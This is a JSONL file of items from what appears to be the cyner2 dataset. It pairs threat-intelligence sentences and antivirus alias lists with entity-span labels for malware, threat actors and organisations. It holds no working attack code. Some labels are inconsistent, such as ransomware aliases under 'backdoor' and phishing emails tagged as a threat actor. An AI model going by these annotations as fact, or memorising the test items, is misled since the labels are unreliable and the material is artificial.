{"text": "A backdoor also known as: Trojan.PWS.ZKD Trojan/W32.naKocTb.106496 Trojan.Mauvaise.SL1 Spyware.Infostealer.Fareit Spyware.LokiBot Trojan/Fareit.l Trojan.PWS.ZKD TSPY_LOKI.SMA Win32.Trojan.WisdomEyes.16070401.9500.9723 W32/Trojan.LAPN-1109 TSPY_LOKI.SMA Win.Trojan.naKocTb-6331389-1 Trojan.PWS.ZKD Trojan.PWS.ZKD Trojan.Win32.Stealer.eshrhl Trojan.PWS.Stealer.17779 Trojan.naKocTb.Win32.12 BehavesLike.Win32.Downloader.ch W32/Trojan2.PBTA Trojan.naKocTb.l PWS:Win32/Primarypass.A Trojan.PWS.ZKD Troj.W32.naKocTb.tnB5 Trojan/Win32.naKocTb.C1575888 Trojan.naKocTb Trj/GdSda.A Trojan.Nakoctb Win32/PSW.Fareit.L Trojan-Spy.Dyzap Win32/Trojan.15d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005938", "source": "cyner2_train"}}
{"text": "Starting in November 2022, Morphisec has been tracking an advanced info stealer we have named SYS01 stealer. SYS01 stealer uses similar lures and loading techniques to another information stealer recently dubbed S1deload by the Bitdefender group, but the actual payload stealer is different.", "spans": {"ORGANIZATION: Morphisec": [[27, 36]], "MALWARE: advanced info stealer": [[58, 79]], "MALWARE: SYS01 stealer.": [[94, 108]], "MALWARE: SYS01 stealer": [[109, 122]], "MALWARE: S1deload": [[212, 220]], "ORGANIZATION: the Bitdefender group,": [[224, 246]], "MALWARE: payload stealer": [[262, 277]]}, "info": {"id": "cyner2_train_005939", "source": "cyner2_train"}}
{"text": "Article primarily covering activity from 2016.", "spans": {}, "info": {"id": "cyner2_train_005940", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.AutoHotkeyA.Worm Virus.Win32.Sality!O Backdoor.Vercuser.B4 Worm.AutoHotKey.Win32.37 Trojan.Heur.uquarfYBWDlih Win32/Tnega.NCdVJJ Win.Trojan.Ag-13 Worm.Win32.AutoHotKey.a Trojan.Win32.AutoHotKey.cmxqxy Win32.HLLW.Autoruner1.26246 BehavesLike.Win32.Virut.fc Backdoor.Win32.Vercuser Worm:Win32/Vercuser.B Trojan/Win32.Hupigon.R57102 Trj/CI.A Win32/Vercuser.B Win32.Worm.Autohotkey.Dzjb Worm.AutoHotKey!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005941", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Pirril.B5 Trojan/BHO.aisa TROJ_PIRRIL.SMI Win.Trojan.Pirril-7 Trojan.Win32.BHO.czvu Trojan.Win32.BHO.btaog Troj.W32.Bho!c Backdoor.Win32.Ripinip.a TrojWare.Win32.Pirril.smi Win32.HLLW.Riplip.10 Trojan.BHO.Win32.9746 TROJ_PIRRIL.SMI BehavesLike.Win32.Pirril.mm Adware/BHO.bmy Trojan.Graftor.D453B Trojan.Win32.Z.Bho.90112 Trojan.Win32.BHO.czvu Pirril.a Trojan.BHO Trojan.Win32.BHO W32/BHO.AJZ!tr Backdoor.Win32.Ripinip.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005942", "source": "cyner2_train"}}
{"text": "Additionally, others have been referring to the group responsible for the OilRig campaign itself as the OilRig group as well.", "spans": {"THREAT_ACTOR: the group": [[44, 53]], "THREAT_ACTOR: the OilRig campaign": [[70, 89]], "THREAT_ACTOR: the OilRig group": [[100, 116]]}, "info": {"id": "cyner2_train_005943", "source": "cyner2_train"}}
{"text": "Expanded with indicators generated by Alienvault Labs", "spans": {"ORGANIZATION: Alienvault Labs": [[38, 53]]}, "info": {"id": "cyner2_train_005944", "source": "cyner2_train"}}
{"text": "What 's new ? WolfRAT is based on a previously leaked malware named DenDroid .", "spans": {"MALWARE: WolfRAT": [[14, 21]], "MALWARE: DenDroid": [[68, 76]]}, "info": {"id": "cyner2_train_005946", "source": "cyner2_train"}}
{"text": "However, Buckeye's focus appears to have changed as of June 2015, when the group began compromising political entities in Hong Kong.", "spans": {"THREAT_ACTOR: Buckeye's": [[9, 18]], "THREAT_ACTOR: group": [[75, 80]], "ORGANIZATION: political entities": [[100, 118]]}, "info": {"id": "cyner2_train_005947", "source": "cyner2_train"}}
{"text": "F5 research conducted in March 2017 followed 153 Marcher configuration files to uncover target and activity trends in the worldwide attack campaigns.", "spans": {"ORGANIZATION: F5 research": [[0, 11]], "MALWARE: Marcher": [[49, 56]], "THREAT_ACTOR: the worldwide attack campaigns.": [[118, 149]]}, "info": {"id": "cyner2_train_005948", "source": "cyner2_train"}}
{"text": "The Word document initiated the same multiple-stage infection process as the file from the Hybrid Analysis report we previously discovered and allowed us to reconstruct a more complete infection process.", "spans": {}, "info": {"id": "cyner2_train_005949", "source": "cyner2_train"}}
{"text": "SpiderLabs has uncovered a new strain of malware that can steal cryptocurrencies and other digital currencies.", "spans": {"ORGANIZATION: SpiderLabs": [[0, 10]], "MALWARE: malware": [[41, 48]]}, "info": {"id": "cyner2_train_005950", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.Protoride.59392 W32.Protoride.E Worm.RAHack W32/Protoride2.worm Trojan.Win32.Protoride.fsfk W32/Protoride.C.unp W32.Protoride.Worm Win32/Protoride.E Worm.Protoride.F Worm.Win32.Protoride.59392[h] W32.W.Protoride.e!c Worm.Win32.Protoride.E BackDoor.IRC.Cirilico Worm.Protoride.Win32.7 BehavesLike.Win32.SpyLydra.qc W32/Protoride.ZUZR-8900 Worm/Protoride.e WORM/Protoride.E.2 Worm[Net]/Win32.Protoride Worm/Win32.IRCBot Worm:Win32/Protoride.F Win32/Protoride.F W32/Protoride.worm BScope.Trojan.IRCbot Win32.Worm-net.Protoride.Lorr Net-Worm.Win32.Protoride", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005951", "source": "cyner2_train"}}
{"text": "Following the April 2017 Patch Tuesday, in which Microsoft disabled EPS, FireEye detected a second unknown vulnerability in EPS.", "spans": {"ORGANIZATION: Microsoft": [[49, 58]], "SYSTEM: EPS,": [[68, 72]], "ORGANIZATION: FireEye": [[73, 80]], "VULNERABILITY: unknown vulnerability": [[99, 120]], "SYSTEM: EPS.": [[124, 128]]}, "info": {"id": "cyner2_train_005953", "source": "cyner2_train"}}
{"text": "In the most recent versions, APT19 added an application whitelisting bypass to the macro-enabled Microsoft Excel XLSM documents.", "spans": {"THREAT_ACTOR: APT19": [[29, 34]]}, "info": {"id": "cyner2_train_005954", "source": "cyner2_train"}}
{"text": "The NCSC has observed these tools being used by the Turla group to maintain persistent network access and to conduct network operations.", "spans": {"ORGANIZATION: The NCSC": [[0, 8]], "MALWARE: tools": [[28, 33]], "ORGANIZATION: the Turla group": [[48, 63]], "SYSTEM: network access": [[87, 101]]}, "info": {"id": "cyner2_train_005955", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Cerber.B NSIS/ObfusRansom.f Ransom_Enestaller.R00EC0CL417 Packed.NSISPacker!g4 Ransom_Enestaller.R00EC0CL417 Trojan.Nsis.Zerber.emhumo BehavesLike.Win32.ObfusRansom.dc Ransom.Cerber/Variant Trojan/Win32.Cerber.R196343 Ransom.Cerber W32/Injector.UQ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005956", "source": "cyner2_train"}}
{"text": "A file called x32dbg.exe was used to sideload a malicious DLL we identified as a variant of PlugX.", "spans": {"MALWARE: variant": [[81, 88]], "MALWARE: PlugX.": [[92, 98]]}, "info": {"id": "cyner2_train_005957", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Graftor.Elzob.D5035 Win32.Trojan.WisdomEyes.16070401.9500.9799 W32/Trojan2.HUBT Win32/Tnega.RA Trojan.Cebaek BehavesLike.Win32.PWSOnlineGames.pm W32/Trojan.JRGD-8081 PWS:Win32/Jomloon.E BScope.Trojan-Downloader.6707 W32/PWS_y.XR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005958", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.WinShell.12832 Backdoor.WinShell.I W32/Backdoor.LOY Backdoor.Winshell.50 W32/Winshell.AIC Backdoor.Win32.WinShell.50 BackDoor.WinShell.74 Backdoor.Win32.WinShell.50!IK Backdoor/WinShell.50 Backdoor:Win32/Winshell.G Backdoor.Win32.A.WinShell.203004.A W32/Backdoor.LOY Win-Trojan/Winshell.54178 Backdoor.Win32.WinShell.50 Win32/WinShell.50 Backdoor.WinShell Backdoor.Win32.WinShell.50 W32/Winshell.A!tr.bdr Bck/Winshell.F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005959", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.VB!O Trojan.VB.Win32.23241 Trojan/VB.ymg Win32.Trojan.WisdomEyes.16070401.9500.9965 TROJ_VB.JNH Worm.Win32.VBNA.b Trojan.Win32.VB.edhhbs Trojan.Win32.A.VB.206336[UPX] Backdoor.W32.VB.l0cp TrojWare.Win32.Trojan.VB.~Ymg Trojan.VbCrypt.68 TROJ_VB.JNH BehavesLike.Win32.Rontokbro.lc Trojan.Win32.Sopcol Worm.VBNA.skk Trojan:Win32/Sopcol.A Worm/Win32.VBNA Trojan.Jaiko.DF2A Worm.Win32.VBNA.b Trojan:Win32/Sopcol.A Trojan/Win32.Xema.C33567 SScope.Trojan.VBO.0286 Trojan.VB!6EP+kawqBsw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005963", "source": "cyner2_train"}}
{"text": "Black Vine's targets include gas turbine manufacturers, large aerospace and aviation companies, healthcare providers, and more.", "spans": {"THREAT_ACTOR: Black Vine's": [[0, 12]], "ORGANIZATION: gas turbine manufacturers, large aerospace": [[29, 71]], "ORGANIZATION: aviation companies, healthcare providers,": [[76, 117]]}, "info": {"id": "cyner2_train_005964", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.WinfileH.Worm Email-Worm.Win32.VB!O Worm.Wukill.AM3 Trojan.TempCom Win32.Worm.VB.sg W32/VB.KL W32.Traxg@mm Win32/Traxg.B WORM_VB.F Win.Worm.Traxg-4 Trojan.Win32.Scar.avxe Trojan.Win32.Scar.bjfnz Troj.W32.Scar!c Trojan.Win32.Rays.tzs Win32.HLLM.Utenti Worm.Rays.Win32.3 WORM_VB.F BehavesLike.Win32.Autorun.cz W32/VB.CWJD-9096 I-Worm/Wukill.j W32.Email-worm.Win32.Rays WORM/Traxgy.B Worm[Email]/Win32.VB Worm.Rays.8192 I-Worm.Win32.Traxg.57344 Trojan.Win32.Scar.avxe Worm:Win32/Wukill.G@mm Worm/Win32.Traxg.R2565 W32/Nethood.worm SScope.Trojan.VBO.0362 I-Worm.VB.NBB Win32/VB.NBB I-Worm.Rays.K W32/Vinet.A.worm Trojan.Win32.VBCode.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005965", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Tufei503.PE Win32.Tufik.A Virus.Win32.Tufik!O W32.Tufik.A Troj.GameThief.W32.Magania.leKk PE_TUFIK.B Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Tufik.A W32.Tufik Win32/Tufik.A PE_TUFIK.B Win.Trojan.Tufik-3 Win32.Tufik.A Packed.Win32.Krap.hm Win32.Tufik.A Virus.Win32.Tufik.cdpn Win32.Tufik.A Virus.Win32.Virut.Ce VBS.Dropper.128 Virus.Tufik.Win32.2 BehavesLike.Win32.PWSZbot.dh Trojan-Dropper.Win32.Wlord W32/Tufik.A Win32/Tufei.a W32/Tufik.J Win32.Tufik.a.13824 Win32.Tufik.A Packed.Win32.Krap.hm Worm:Win32/Tufik.A Win32.Tufik.A Virus.Win32.Tufei.13798 Worm.Qakbot W32/Tufei.A Trojan.Zbot Win32/Tufik.A Virus.Win32.Tufik.cb Win32.Perez.B Win32/Sorter.AutoVirus.VMKUKU.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005967", "source": "cyner2_train"}}
{"text": "In our initial two-part blog series on FIN7 we covered network activity patterns, payloads, and defensive best practices.", "spans": {"THREAT_ACTOR: FIN7": [[39, 43]], "MALWARE: payloads,": [[82, 91]]}, "info": {"id": "cyner2_train_005968", "source": "cyner2_train"}}
{"text": "hackers, leaving most areas of western Ukraine in the dark.", "spans": {"THREAT_ACTOR: hackers,": [[0, 8]]}, "info": {"id": "cyner2_train_005969", "source": "cyner2_train"}}
{"text": "The threat actors behind Operation Tropic Trooper—we named specifically for its choice of targets—aim to steal highly classified information from several Taiwanese government ministries and heavy industries as well as the Philippine military.", "spans": {"THREAT_ACTOR: threat actors": [[4, 17]], "THREAT_ACTOR: Operation Tropic Trooper—we": [[25, 52]], "ORGANIZATION: Taiwanese government ministries": [[154, 185]], "ORGANIZATION: heavy industries": [[190, 206]], "ORGANIZATION: Philippine military.": [[222, 242]]}, "info": {"id": "cyner2_train_005970", "source": "cyner2_train"}}
{"text": "In addition to using PlugX and Poison Ivy PIVY, both known to be used by the group, they also used a new Trojan called ChChes by the Japan Computer Emergency Response Team Coordination Center JPCERT.", "spans": {"MALWARE: PlugX": [[21, 26]], "MALWARE: Poison Ivy PIVY,": [[31, 47]], "MALWARE: Trojan": [[105, 111]], "MALWARE: ChChes": [[119, 125]], "ORGANIZATION: the Japan Computer Emergency Response Team Coordination Center JPCERT.": [[129, 199]]}, "info": {"id": "cyner2_train_005972", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Quolko.A Trojan/Dropper.Drooptroop.ixt Trojan.Heur.JP.dmGfaeisekjc Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Bamital.I Win32/Droplet.LNE TROJ_KRYPTIK.SMY Trojan.Win32.Drooptroop.cxmbc Troj.GameThief.W32.OnLineGames.lkrK Backdoor.Win32.Shiz.A Trojan.Packed.21232 Dropper.Drooptroop.Win32.3912 TROJ_KRYPTIK.SMY BehavesLike.Win32.Ramnit.qc Trojan.Win32.Bulta W32/Bamital.I TrojanDropper.Drooptroop.cuc Worm:Win32/Yahos.A Trojan/Win32.Zbot.C168741 Trojan.SB.01742 Win32.Trojan-dropper.Drooptroop.Wlzg Trojan.DR.Drooptroop!S4bmnA2fbPM W32/Drooptroop.SMY!tr Win32/Trojan.98f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005974", "source": "cyner2_train"}}
{"text": "A backdoor also known as: AIT:Trojan.Autoit.CLU Win32.Trojan.WisdomEyes.16070401.9500.9768 AIT:Trojan.Autoit.CLU AIT:Trojan.Autoit.CLU AIT:Trojan.Autoit.CLU AIT:Trojan.Autoit.CLU Trojan.Autoit.F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005978", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Nosok!O Trojan/Nosok.dez Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Worm.AMZR Trojan.Win32.Nosok.ignra Worm.Win32.A.AutoRun.78881 Trojan.DownLoader11.6990 Trojan.Nosok.Win32.81 BehavesLike.Win32.VirRansom.dc W32/Worm.SMLT-2477 Trojan/Nosok.df Trojan.Razy.D2AA1A Trojan/Win32.Xema.C90213 Worm.AutoRun!dge3lshCyjI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005981", "source": "cyner2_train"}}
{"text": "The Threat Actor would then craft specific spear phishing emails to direct their targets to visit the malicious web sites and open the malware laden documents.", "spans": {"THREAT_ACTOR: The Threat Actor": [[0, 16]], "THREAT_ACTOR: spear phishing emails": [[43, 64]], "MALWARE: the malware laden documents.": [[131, 159]]}, "info": {"id": "cyner2_train_005986", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Scar Win32.Trojan.WisdomEyes.16070401.9500.9573 Trojan.Win32.Scarsi.apft Trojan.Win32.Inject.ewxioq Trojan.MulDrop6.38561 BehavesLike.Win32.AdwareSearchProtect.jc TR/Inject.oiycd TrojanSpy:MSIL/CoinStealer.C!bit Trojan.Win32.Scarsi.apft Trojan/Win32.Scarsi.C2337044 Trj/CI.A Win32.Trojan.Scarsi.Dkx Trojan.Win32.Injector W32/Injector.DUUK!tr Win32/Trojan.f68", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005987", "source": "cyner2_train"}}
{"text": "In the second half of 2016, ESET researchers identified a unique malicious toolset that was used in targeted cyberattacks against high-value targets in the Ukrainian financial sector.", "spans": {"ORGANIZATION: ESET researchers": [[28, 44]], "MALWARE: malicious toolset": [[65, 82]], "ORGANIZATION: the Ukrainian financial sector.": [[152, 183]]}, "info": {"id": "cyner2_train_005988", "source": "cyner2_train"}}
{"text": "In this blog we will detail our discovery of the next two versions of MM Core, namely BigBoss 2.2-LNK and SillyGoose 2.3-LNK.", "spans": {"MALWARE: versions": [[58, 66]], "MALWARE: MM Core,": [[70, 78]], "MALWARE: BigBoss 2.2-LNK": [[86, 101]], "MALWARE: SillyGoose 2.3-LNK.": [[106, 125]]}, "info": {"id": "cyner2_train_005991", "source": "cyner2_train"}}
{"text": "During the preparation of the IT threat evolution Q2 2017 report I found several common Trojans in the Top 20 mobile malware programs list that were stealing money from users using WAP-billing – a form of mobile payment that charges costs directly to the user's mobile phone bill so they don't need to register a card or set up a user-name and password.", "spans": {"ORGANIZATION: the IT threat evolution": [[26, 49]], "MALWARE: Trojans": [[88, 95]], "MALWARE: mobile malware": [[110, 124]], "ORGANIZATION: users": [[169, 174]], "SYSTEM: user's mobile phone": [[255, 274]]}, "info": {"id": "cyner2_train_005992", "source": "cyner2_train"}}
{"text": "Here is a full list of possible commands that can be executed by the first module : Command name Description @ stop Stop IRC @ quit System.exit ( 0 ) @ start Start IRC @ server Set IRC server ( default value is “ irc.freenode.net ” ) , port is always 6667 @ boss Set IRC command and control nickname ( default value is “ ISeency ” ) @ nick Set IRC client nickname @ screen Report every time when screen is on ( enable/disable ) @ root Use root features ( enable/disable ) @ timer Set period of IRCService start @ hide Hide implant icon @ unhide Unhide implant icon @ run Execute specified shell @ broadcast Send command to the second module @ echo Write specified message to log @ install Download and copy specified component to the system path The implant uses a complex intent-based communication mechanism between its components to broadcast commands : Approximate graph of relationships between BusyGasper components Second ( main ) module This module writes a log of the command execution history to the file named “ lock ” , which is later exfiltrated .", "spans": {}, "info": {"id": "cyner2_train_005993", "source": "cyner2_train"}}
{"text": "This post takes a look at a new banking malware that has, so far, been targeting financial institutions in Latin America—specifically, Mexico and Peru.", "spans": {"MALWARE: new banking": [[28, 39]], "ORGANIZATION: financial institutions": [[81, 103]]}, "info": {"id": "cyner2_train_005994", "source": "cyner2_train"}}
{"text": "On June 9th, 2017 Morphisec Lab published a blog post detailing a new infection vector technique using an RTF document containing an embedded JavaScript OLE object.", "spans": {"ORGANIZATION: Morphisec Lab": [[18, 31]]}, "info": {"id": "cyner2_train_005995", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.JS.QAI PDF.Trojan.4250 JS.Exploit.Pdfka.jr JS/Exploit.Pdfka.QNP JS_PIDIEF.SMQ Exploit.JS.Pdfka.axt Trojan.JS.QAI Exploit.Script.Pdfka.otnl Trojan.JS.QAI Exploit.JS.Pdfka.aqn Trojan.JS.QAI JS_PIDIEF.SMQ BehavesLike.PDF.Exploit.zb EXP/Pidief.hcb Trojan[Exploit]/JS.Pdfka.axt Trojan.JS.QAI Exploit.JS.Pdfka.axt Exploit.JS.Pdfka.axt Exploit.JS.Pdfka JS/Pdfka.AABY!exploit virus.js.pdfjs", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005996", "source": "cyner2_train"}}
{"text": "Targeted individuals that enabled macros in a malicious Microsoft Word document may have been infected with Poison Ivy, a popular remote access tool RAT that has been used for nearly a decade for key logging, screen and video capture, file transfers, password theft, system administration, traffic relaying, and more.", "spans": {"ORGANIZATION: individuals": [[9, 20]], "MALWARE: macros": [[34, 40]], "MALWARE: Poison Ivy,": [[108, 119]], "MALWARE: popular remote access tool RAT": [[122, 152]]}, "info": {"id": "cyner2_train_005997", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PDF/Phish.AGU Troj.Downloader.Pdf!c PDF/Phish.AGU Trojan.PDF.Phishing Win32/Trojan.Downloader.8a8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005998", "source": "cyner2_train"}}
{"text": "Sundown remained highly vigilant and the subdomains in use were recycled quickly to help in avoiding detection.", "spans": {"MALWARE: Sundown": [[0, 7]]}, "info": {"id": "cyner2_train_005999", "source": "cyner2_train"}}
{"text": "Dridex has drastically reduced in volume throughout 2016.Actors are now appearing to prefer crypto-ransomware such as Locky over the infamous banking trojan.However, Dridex is still being actively developed.", "spans": {"MALWARE: Dridex": [[0, 6], [166, 172]], "MALWARE: crypto-ransomware": [[92, 109]], "MALWARE: Locky": [[118, 123]], "MALWARE: banking": [[142, 149]]}, "info": {"id": "cyner2_train_006000", "source": "cyner2_train"}}
{"text": "From September 2016 through late November 2016, a threat actor group used both the Trochilus RAT and a newly idenfied RAT we've named MoonWind to target organizations in Thailand, including a utility organization.", "spans": {"THREAT_ACTOR: a threat actor group": [[48, 68]], "MALWARE: the Trochilus RAT": [[79, 96]], "MALWARE: RAT": [[118, 121]], "MALWARE: MoonWind": [[134, 142]], "ORGANIZATION: organizations": [[153, 166]], "ORGANIZATION: utility organization.": [[192, 213]]}, "info": {"id": "cyner2_train_006005", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Killav Downloader.Betload.Win32.51 Win32.Trojan.WisdomEyes.16070401.9500.9783 Trojan.Win32.KillAV.me Troj.W32.SchoolGirl.tnx1 Trojan.Win32.Killav BehavesLike.Win32.Downloader.lh Trojan.Win32.KillAV.me Trojan.Win32.Killav BAT/KillAV.NCO Win32.Trojan.Killav.Pgwh PUA.Bat.Hoax W32/KillAV.ME!tr Win32/Trojan.ba9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006006", "source": "cyner2_train"}}
{"text": "The group has been in operation since at least 2011 but has re-emerged over the past two years from a quiet period following exposure by Symantec and a number of other researchers in 2014.", "spans": {"THREAT_ACTOR: The group": [[0, 9]], "ORGANIZATION: Symantec": [[137, 145]], "ORGANIZATION: researchers": [[168, 179]]}, "info": {"id": "cyner2_train_006007", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Bamital.EC Trojan/PornoBlocker.jhw W32/PornoBlocker.N Win32/PornoBlocker.EW TROJ_KRYPTK.SM11 Trojan-Ransom.Win32.Gimemo.cpe Trojan.Win32.A.PornoBlocker.59904 Trojan-Ransom.Win32.PornoBlocker!IK TrojWare.Win32.Bamital.FA Trojan.Hosts.4025 TROJ_KRYPTK.SM11 Trojan/PornoBlocker.aba TrojanDropper:Win32/Bamital.I Hoax.PornoBlocker.jhw Downloader.Lofog Win32/Bamital.FA Trojan-Ransom.Win32.PornoBlocker W32/Bamital.FA!tr Bck/Qbot.AO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006008", "source": "cyner2_train"}}
{"text": "The user would have to then open the downloaded executable in order to infect their computer.", "spans": {"MALWARE: downloaded executable": [[37, 58]], "SYSTEM: computer.": [[84, 93]]}, "info": {"id": "cyner2_train_006009", "source": "cyner2_train"}}
{"text": "The first sample found was submitted 7 months ago.", "spans": {}, "info": {"id": "cyner2_train_006010", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Swrort.d Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Swrort-5710536-0 Packed.Win32.BDF.a Trojan.Win32.Shellcode.ewfvwj TrojWare.Win32.Rozena.A Trojan.Swrort.1 Swrort.d Trojan:Win32/Meterpreter.A Packed.Win32.BDF.a W32/Swrort.C!tr Win32/Trojan.6bc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006012", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Downldr2.EOVV Infostealer.Bancos Trojan-Downloader.Win32.Banload.aadik Trojan.Win32.Banload.bmdsil Trojan.DownLoad.22103 BehavesLike.Win32.Pate.dc W32/Downloader.SIUT-2288 TrojanDownloader.Banload.bhyz Troj.Downloader.W32.Banload.aadik!c Trojan-Downloader.Win32.Banload.aadik Trojan:Win32/Pitke.A Trojan/Win32.Banker.R143357 Win32.Trojan-downloader.Banload.Ebrq Trojan.Win32.Scar W32/DelpBanc.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006015", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Runar.53248 Backdoor/Runar.b W32/Backdoor.LCQ Backdoor.Trojan Win.Trojan.Runar-2 Backdoor.Win32.Runar.b Trojan.Win32.Runar.dmmx Backdoor.Win32.A.Runar.53248 Win32.Backdoor.Runar.duq Backdoor.Win32.Runar.b BackDoor.Hiper Backdoor.Runar.Win32.6 W32/Backdoor.WJPY-2871 BDS/Runar.B Trojan[Backdoor]/Win32.Runar Backdoor.W32.Runar.b!c Backdoor.Win32.Runar.b Backdoor:Win32/Runar.B Backdoor.Runar Backdoor.Runar!lU3ZFWcAWmA W32/Runar.B!tr.bdr Win32/Backdoor.d80", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006016", "source": "cyner2_train"}}
{"text": "It did not take long for attackers to repackage this PoC and use it in attacks in the wild.", "spans": {"THREAT_ACTOR: attackers": [[25, 34]], "MALWARE: PoC": [[53, 56]]}, "info": {"id": "cyner2_train_006018", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom:Win32/Jaffrans.A!rsm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006020", "source": "cyner2_train"}}
{"text": "There are the following relevant detection paths ( the last one is an alternative Telegram client – “ Telegram X “ ) : Name Detection path Sex Game For Adults 18.apk /storage/emulated/0/WhatsApp/Media/WhatsApp Documents/ 4_6032967490689041387.apk /storage/emulated/0/Telegram/Telegram Documents/ Psiphon-v91.apk /storage/emulated/0/Android/data/org.thunderdog.challegram/files/documents/ Backdoored Open Source During the course of our analysis , we also found samples sharing code with the ViceLeaker malware , in particular they shared a delimiter that was used in both cases to parse commands from the C2 server .", "spans": {"MALWARE: ViceLeaker": [[491, 501]]}, "info": {"id": "cyner2_train_006022", "source": "cyner2_train"}}
{"text": "The Darkhotel APT continues to spearphish targets around the world, with a wider geographic reach than its previous botnet buildout and hotel Wi-Fi attacks.", "spans": {"THREAT_ACTOR: The Darkhotel APT": [[0, 17]], "THREAT_ACTOR: spearphish": [[31, 41]], "MALWARE: botnet": [[116, 122]]}, "info": {"id": "cyner2_train_006023", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Mangit BKDR_MANGIT.SM W32/Adware5.BH BKDR_MANGIT.SM Trojan-Banker.Win32.Banbra.tolm Trojan.Win32.Banker1.eeflxo Trojan.PWS.Banker1.21424 Dropper.DapatoCRTD.Win32.29 W32/Adware.ZANB-0757 Trojan.Banker.19 Trojan-Banker.Win32.Banbra.tolm Backdoor:Win32/Mangit.A Trj/GdSda.A Win32.Trojan-banker.Banbra.Syia Trojan.PWS.Banbra!KoDGdYjSbaA Trojan-Downloader.Win32.Delf Win32/Trojan.5ed", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006025", "source": "cyner2_train"}}
{"text": "FireEye recently detected malicious Microsoft Office RTF documents that leverage CVE-2017-0199, a previously undisclosed vulnerability.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "VULNERABILITY: undisclosed vulnerability.": [[109, 135]]}, "info": {"id": "cyner2_train_006026", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Worm.Rikihaki.A4 Trojan.Razy.D23D4 WORM_RIKIHAKI.SM Trojan.Tinba WORM_RIKIHAKI.SM Trojan.Win32.KillFiles.didhhl Trojan.KillFiles.14550 BehavesLike.Win32.Worm.gh TR/ATRAPS.sxzgc Worm:Win32/Rikihaki.A Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006028", "source": "cyner2_train"}}
{"text": "This could change once the trojan spy has fully developed.", "spans": {}, "info": {"id": "cyner2_train_006029", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/VBTroj.CYJD Trojan.Win32.VB!IK Trojan.Win32.VB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006031", "source": "cyner2_train"}}
{"text": "Most of the attacks begin with a phone call from a UK phone number, with attackers speaking in either English or Farsi.", "spans": {}, "info": {"id": "cyner2_train_006035", "source": "cyner2_train"}}
{"text": "While some ransomware i.e. Chimera give bogus threats about stealing and releasing private files, there are other malware families that in fact have made this possibility a reality.", "spans": {"MALWARE: ransomware": [[11, 21]], "MALWARE: Chimera": [[27, 34]], "MALWARE: malware families": [[114, 130]]}, "info": {"id": "cyner2_train_006037", "source": "cyner2_train"}}
{"text": "Unit 42 researchers have uncovered a backdoor Trojan used in an espionage campaign.", "spans": {"ORGANIZATION: Unit 42 researchers": [[0, 19]], "MALWARE: backdoor Trojan": [[37, 52]], "THREAT_ACTOR: an espionage campaign.": [[61, 83]]}, "info": {"id": "cyner2_train_006038", "source": "cyner2_train"}}
